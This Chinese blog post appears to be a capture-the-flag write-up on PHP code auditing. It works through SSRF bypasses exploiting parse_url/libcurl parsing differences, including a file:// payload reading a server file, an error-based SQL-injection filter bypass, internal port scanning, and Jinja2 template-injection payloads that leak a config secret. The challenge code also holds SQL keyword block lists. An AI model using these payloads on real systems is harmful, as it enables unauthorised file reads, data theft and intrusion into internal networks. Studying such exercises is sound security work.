Fork me on GitHub

记录php代码审计

Posted on | Post modified: | In
Words count in article: 925 | Reading time ≈ 4

怎么过去呢

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.baidu.com')
{
    var_dump(parse_url($_POST['url'])['host']);
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $_POST['url']);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $content = curl_exec($curl);
    echo $content;
    curl_close($curl);
    $filename='download/'.rand().';img1.jpg';
    file_put_contents($filename,$content);
    echo $_POST['url'];
    $img="<img src=\"".$filename."\"/>";
    echo $img;
}
else
{
    echo "you need post url: http://www.ichunqiu.com";
}

这里主要还是利用parse_url这个函数

其实这里利用的是一个parse_urllibcurl之间的差异

匹配规则:

1
2
3
4
5
php parse_url:
host: 匹配最后一个@后面符合格式的host

libcurl:
host:匹配第一个@后面符合格式的host

比如这个URL
http://u:p@a.com:80@b.com/

parse_url解析结果

1
2
3
4
schema: http 
host: b.com
user: u
pass: p@a.com:80

libcurl解析结果:

1
2
3
4
5
6
schema: http
host: a.com
user: u
pass: p
port: 80
后面的@b.com/会被忽略掉

这样我么就可以构造payload:

url=file://@127.0.0.1:80@www.baidu.com/./..//var/www/html/flag.php

parse_url解析出www.baidu.com绕过if
然后curl解析file协议

ssrf绕过记录
Some trick in ssrf and unserialize()/#trick2-libcurl-and-parse-url)

parse_url函数的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
error_reporting(0);
$_GET=Add_S($_GET);
$_POST=Add_S($_POST);
$_COOKIE=Add_S($_COOKIE);
$_REQUEST=Add_S($_REQUEST);
function Add_S($array)
{
foreach($array as $key=>$value){
            if(!is_array($value)){
                    $check= preg_match('/regexp|and|like|\"|%|insert|update|delete|union|into|load_file|outfile|\/\*/i', $value);
                    if($check)
                            {
                            exit("Hacker!");
                    }
            }else{
                    $array[$key]=Add_S($array[$key]);
            }
    }
return $array;
}

function Measurement_url()
{
    $url=parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    $Keyword=array("from","select","like","or");
    foreach($query as $key)
    {
    foreach($Keyword as $value)
    {
        if(preg_match("/".$value."/",strtolower($key)))
        {
            die("fuck u!");
        }
    }
}
}
?>

Add_S函数中把一些关键字都给过滤了,同时还有一部分关键字是在Measurement_url函数中过滤的,但是这个函数中有一个parse_url函数

http://127.0.0.1///info/parseurl.php?sql=select 这种形式的URL经过parse_url后会返回false。。

于是可以绕过的payload如下

http://118.126.113.78///web1/?id=1' ^ 1=extractvalue(1,concat(0x3a,(select password from sql_inject1 limit 3,1),0x3a))--+

具体parse_url漏洞的分析可以参考一叶飘零师傅的文章

然而我在本地测试的时候:

并没有成功,php的版本:


这就很奇怪了

1
2
3
4
5
6
7
8
<?php 
$url = "http://localhost///web/trick1/parse.php?sql=select";

$parse_url_result = parse_url($url);

print_r($parse_url_result);

 ?>

一道入群题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

很明显这是一道ssrf的题目,白名单,只能用如下协议http|https|gopher|dict

两个payload均可

1
2
payload1: ?url=http://127.0.0.1./flag.php
payload2: ?url=http://@127.0.0.1:80@baidu.com/flag.php

然后开始爆破内网的ip和端口

居然不记得怎么用Burp同时爆破两个字段了,查了一下 https://bbs.ichunqiu.com/thread-17395-1-1.html

可以得到172.11.243.81:8080和172.11.243.218:3306,分别为一个flask服务和mysql服务。

通过http访问内网的flask

得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import flask
import os
app = flask.Flask(__name__)
app.config['HINT'] = os.environ.pop('HINT')
@app.route('/')
def index():
    return open(__file__).read()
@app.route('/yulige/<path:yulige>')
def yulige(yulige):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist])+s
    return flask.render_template_string(safe_jinja(yulige))
if __name__ == '__main__':
    app.run("0.0.0.0",port=8080)

模板注入得到HINT

payload

1
2
#payload:{{url_for.__globals__[%27current_app%27].config[%27HINT%27]}}
#payload:{{get_flashed_messages.__globals__[%27current_app%27].config[%27HINT%27]}}

string(29) “mysql_user_is_yuligeeee123321”